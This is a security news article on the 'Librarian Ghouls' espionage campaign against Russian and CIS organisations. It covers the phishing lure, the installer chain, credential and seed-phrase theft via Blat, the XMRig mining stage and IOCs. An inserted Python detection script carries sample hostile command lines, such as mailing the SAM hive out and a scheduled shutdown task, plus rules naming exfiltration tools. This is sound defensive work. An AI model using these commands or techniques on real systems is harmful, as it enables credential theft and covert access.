‘Librarian Ghouls’ APT Group Launches Ongoing Malware Attacks on Organizations

A sophisticated cyber espionage campaign attributed to the advanced persistent threat (APT) group known as “Librarian Ghouls”, also tracked as “Rare Werewolf” and “Rezet”, continues to target organizations in Russia and the CIS region.

The group is notable for its extensive use of legitimate third-party utilities and off-the-shelf tools, which complicates both detection and attribution efforts.

Activity from this actor has persisted through May 2025, with a surge in attacks following a brief lull in late 2024.

Infection Vector

Librarian Ghouls leverage highly targeted spear-phishing emails delivered in the Russian language.

[Figure: Example of a phishing page associated with the APT campaign]

According to the Securelist report, these emails contain password-protected archives mimicking official documents, such as payment orders.

The infection is triggered when victims extract and open these files, which initiate a self-extracting installer created with Smart Install Maker.

Upon execution, the installer deploys benign decoys, the curl utility, and an LNK shortcut, all placed within the C:\Intel directory.

The core malicious functionality is orchestrated via command and PowerShell scripts encoded in the installer’s configuration file.

These scripts automate several key actions: deploying the legitimate 4t Tray Minimizer (used to mask malicious windows in the system tray), extracting further payloads, and enabling remote access.

The installer executes a batch file (rezet.cmd), which downloads additional binaries from a command-and-control (C2) server.

These include a custom WinRAR executable (driver.exe), the mail-sending tool Blat (blat.exe), AnyDesk for remote desktop control, Defender Control to disable Windows Defender protections, and further batch scripts.

The attack chain continues with the deployment of scheduled tasks designed to shut down the compromised system at 5 AM daily, hindering victim awareness and providing a window for attacker activities.

A PowerShell script (wol.ps1) is leveraged to wake the system and launch Microsoft Edge at 1 AM, ensuring the device is available for remote sessions before the scheduled daily shutdown.

Exfiltration relies on Blat to transmit the collected credentials, including those for cryptocurrency wallets, browser passwords, registry hives (HKLM\SAM, HKLM\SYSTEM), and seed phrases.

Crypto Mining

Towards the end of the infection chain, the threat actors install a crypto miner by downloading an installer from attacker infrastructure.

[Figure: PDF document imitating a payment order]

This installer checks for existing miner processes and downloads the XMRig mining toolset if not detected.

The miner is configured via a local JSON file and designed to maximize efficiency by collecting system specs, including CPU, RAM, and GPU information, all of which are also communicated to the C2 servers.

Persistence is maintained through scheduled tasks and the deployment of additional legitimate utilities such as Mipko Personal Monitor (for keylogging and screenshots), WebBrowserPassView (for password collection), ngrok (reverse proxy), and NirCmd for covert script execution.
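One way a defender could turn the tradecraft described above (tools staged in C:\Intel, rezet.cmd, the daily 5 AM shutdown task, wol.ps1, Blat-based exfiltration, XMRig and the dual-use utilities) into a host-triage check. This is an added example, not code from the report or from Kaspersky; the event records, rule weights and alert threshold are constructed assumptions.

```python
"""Score hosts from process-creation telemetry against behaviours described
in the Librarian Ghouls report. Records are constructed, Sysmon-like samples."""
import re
from collections import defaultdict

# Constructed sample events (host, executed image, full command line).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "C:\\Intel\\rezet.cmd",
     "cmdline": "cmd /c C:\\Intel\\rezet.cmd"},
    {"host": "ws01", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": 'schtasks /create /sc daily /st 05:00 /tn "sys" /tr "shutdown /s /f /t 0"'},
    {"host": "ws01", "image": "C:\\Intel\\blat.exe",
     "cmdline": "C:\\Intel\\blat.exe -attach C:\\Intel\\SAM -to x@users-mail.ru"},
    {"host": "ws01", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -ep bypass -f C:\\Intel\\wol.ps1"},
    {"host": "ws02", "image": "C:\\Program Files\\Git\\usr\\bin\\curl.exe",
     "cmdline": "curl https://example.internal/update"},
    {"host": "ws02", "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\xmrig.exe",
     "cmdline": "xmrig.exe -c config.json"},
]

# (rule name, weight, predicate over one event). Weights are an assumption;
# rezet.cmd and Blat are scored highest because the report ties them to this actor.
RULES = [
    ("exec_from_c_intel", 3, lambda e: e["image"].lower().startswith("c:\\intel\\")),
    ("rezet_cmd", 5, lambda e: "rezet.cmd" in e["cmdline"].lower()),
    ("daily_5am_shutdown_task", 4, lambda e: re.search(
        r"schtasks.*?/sc\s+daily.*?/st\s+05:00.*?shutdown", e["cmdline"], re.I)),
    ("wol_ps1", 4, lambda e: "wol.ps1" in e["cmdline"].lower()),
    ("blat_exfil", 5, lambda e: "blat.exe" in e["image"].lower()),
    ("dual_use_tool", 2, lambda e: re.search(
        r"\\(anydesk|driver|blat|ngrok|nircmd|mipko\w*|webbrowserpassview)\.exe$", e["image"], re.I)),
    ("xmrig_miner", 3, lambda e: "xmrig" in e["image"].lower()),
]


def evaluate(events):
    """Return {host: {"score": int, "hits": [rule names]}} for hosts with any hit."""
    result = defaultdict(lambda: {"score": 0, "hits": []})
    for e in events:
        for name, weight, pred in RULES:
            if pred(e):
                r = result[e["host"]]
                r["score"] += weight
                if name not in r["hits"]:
                    r["hits"].append(name)
    return dict(result)


def suspicious_hosts(events, threshold=8):
    """Hosts whose accumulated score reaches the threshold (threshold is an assumption)."""
    return sorted(h for h, r in evaluate(events).items() if r["score"] >= threshold)
```

A single dual-use binary such as curl scores nothing on its own; only the combination of staging path, scheduled shutdown, wake-up script and Blat pushes a host over the threshold.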

Analysis of the attacker’s infrastructure has identified multiple active C2 domains and public-facing web servers with directory listing enabled, exposing stored malicious payloads.

The majority of observed victims are Russian industrial enterprises and educational institutions, with additional targets in Belarus and Kazakhstan.

All phishing artifacts and decoy documents are localized for Russian-speaking users, aligning with the threat actor’s known focus.

Librarian Ghouls exhibit traits commonly found in hacktivist operations: frequent updates to their toolset, reliance on scripting, and avoidance of custom malware binaries in favor of widely available legitimate utilities.

The group continues to refine its methods, notably expanding into credential phishing and multi-stage data exfiltration while maintaining a strong emphasis on operational stealth.

Indicators of Compromise (IOC)

| Type | Value/Hash/Domain | Description |
| --- | --- | --- |
| C2 Server | downdown[.]ru, dragonfires[.]ru | Primary command and control |
| C2 IP | 185.125.51[.]5 | Hosting malicious infrastructure |
| Malicious Domains | users-mail[.]ru, deauthorization[.]online, bmapps[.]org, and others | Phishing and malware delivery |
| Installer Hashes | d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68 (and more) | Malicious install files |
| BAT Script Hashes | e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9 (and more) | Malicious BAT batch files |
| PS1 Script Hashes | 8b6afbf73a9b98eec01d8510815a044cd036743b64fef955385cbca80ae94f15 (and more) | Malicious PowerShell scripts |
| Miner Hash | 649ee35ad29945e8dd6511192483dddfdfe516a1312de5e0bd17fdd0a258c27f | Miner install binary |
| Legitimate Software | AnyDesk, Mipko Personal Monitor, Blat, curl, WebBrowserPassView, ngrok, NirCmd, 4t Tray Minimizer | Used for persistence, exfiltration, or remote access |


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
